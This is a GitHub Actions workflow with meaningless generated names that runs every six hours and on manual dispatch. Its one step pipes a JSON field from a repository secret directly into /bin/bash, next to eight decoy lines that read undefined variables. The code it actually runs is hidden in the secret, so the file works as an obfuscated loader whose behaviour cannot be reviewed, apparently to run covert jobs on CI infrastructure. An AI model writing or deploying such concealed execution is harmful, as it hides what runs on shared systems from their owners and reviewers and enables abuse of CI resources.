name: xieqianli3765

on:
  workflow_dispatch:
  schedule:
    - cron: '50 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xieqianli3765
        env:
          vtmdx5423: ${{ secrets.vtmdx5423 }}
        run: |
          echo $vtmdx5423 | jq -r .hsgy5 | /bin/bash
          echo $suc217 | jq -r .q0449 | /bin/bash
          echo $ldx63330 | jq -r .rfe5321 | /bin/bash
          echo $jr653 | jq -r .wjf851 | /bin/bash
          echo $k42936 | jq -r .x63151 | /bin/bash
          echo $pu9 | jq -r .i15 | /bin/bash
          echo $qsits748 | jq -r .ahecc16443 | /bin/bash
          echo $oa14 | jq -r .uqhc6 | /bin/bash
          echo $ffkyw744 | jq -r .hbx89 | /bin/bash

